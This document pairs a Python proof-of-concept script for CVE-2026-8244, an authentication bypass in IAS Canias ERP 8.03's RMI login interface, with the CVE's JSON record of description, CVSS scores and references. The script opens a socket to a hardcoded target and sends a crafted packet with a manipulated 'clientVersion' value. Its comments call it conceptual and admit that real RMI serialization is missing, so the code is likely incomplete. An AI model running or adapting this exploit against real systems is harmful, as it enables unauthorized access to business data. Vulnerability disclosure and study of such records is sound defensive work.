CVE-2026-8244

import socket import struct # Target configuration TARGET_HOST = "192.168.1.100" TARGET_PORT = 1099 # Default RMI port # CVE-2026-8244 PoC: IAS Canias ERP Improper Authentication # This script attempts to bypass authentication by manipulating the 'clientVersion' argument. def send_malicious_rmi_packet(host, port): """ Sends a crafted RMI packet to exploit the clientVersion validation bypass. Note: This is a conceptual demonstration. Actual RMI protocol implementation requires Java serialization and specific handshake mechanisms. """ try: print(f"[*] Connecting to {host}:{port}...") # Establish TCP connection s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(10) s.connect((host, port)) # In a real exploit, we would perform the RMI handshake (JRMP protocol) # and send a serialized object representing the call. # Here we simulate the payload containing the malicious 'clientVersion'. # Conceptual Payload: Login Request with bypassed clientVersion # Real payload would be a Java serialized object. payload_magic = b"\x4a\x52\x4d\x49" # JRMI Magic Header payload_version = b"\x00\x02" # Version payload_protocol = b"\x4b" # Stream Protocol # Simulate sending the malicious clientVersion argument # e.g., setting it to a value that forces the server to skip auth checks exploit_data = b"\x00\x00\x00\x01" # Arbitrary call data malicious_client_version = "BYPASS_AUTH_CHECK" # Combine headers and data (Simplified for PoC structure) full_packet = payload_magic + payload_version + payload_protocol + exploit_data + malicious_client_version.encode('utf-8') print(f"[*] Sending crafted packet with manipulated clientVersion: '{malicious_client_version}'...") s.send(full_packet) # Check for response response = s.recv(1024) if response: print(f"[+] Received response: {response}") print("[!] Potential vulnerability confirmed if response indicates successful login without creds.") else: print("[-] No response received.") s.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": print("CVE-2026-8244 Proof of Concept") send_malicious_rmi_packet(TARGET_HOST, TARGET_PORT)

{"cve": {"id": "CVE-2026-8244", "sourceIdentifier": "[email protected]", "published": "2026-05-10T10:16:13.040", "lastModified": "2026-05-11T15:08:09.893", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in Industrial Application Software IAS Canias ERP 8.03. This impacts an unknown function of the component Login RMI Interface. The manipulation of the argument clientVersion leads to improper authentication. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}]}], "references": [{"url": "https://gist.github.com/0xb1lal/758bbc5e4d82efea248e675da934ac69", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/808326", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/362460", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/362460/cti", "source": "[email protected]"}]}}